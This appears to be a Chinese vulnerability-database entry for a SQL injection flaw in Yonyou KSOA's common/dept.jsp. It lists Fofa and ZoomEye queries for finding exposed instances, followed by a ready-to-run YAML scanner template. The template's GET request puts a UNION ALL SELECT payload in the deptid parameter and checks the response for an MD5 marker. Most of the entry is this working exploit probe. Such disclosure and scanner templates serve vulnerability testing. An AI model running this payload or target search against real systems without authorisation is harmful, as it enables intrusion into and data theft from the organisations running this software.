yonyou-ksoa-dept-sqli: 用友时空 KSOA common/dept.jsp SQL 注入漏洞

日期: 2025-09-01 | 影响软件: 用友KSOA | POC: 已公开

漏洞描述

Fofa: app="用友-时空KSOA" ZoomEye: app:"用友时空KSOA"

PoC代码[已公开]

id: yonyou-ksoa-dept-sqli

info:
  name: 用友时空 KSOA common/dept.jsp SQL 注入漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="用友-时空KSOA"
    ZoomEye: app:"用友时空KSOA"
  reference:
    - https://mp.weixin.qq.com/s/I6aG2vFIi5nbVZfuVNpyDw
  tags: yonyou,ksoa,sqli
  created: 2023/12/09

rules:
  r0:
    request:
      method: GET
      path: /common/dept.jsp?deptid=1' UNION ALL SELECT 60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'12345'))--+
    expression: response.status == 200 && response.body.bcontains(b'0x827ccb0eea8a706') 
expression: r0()

相关漏洞推荐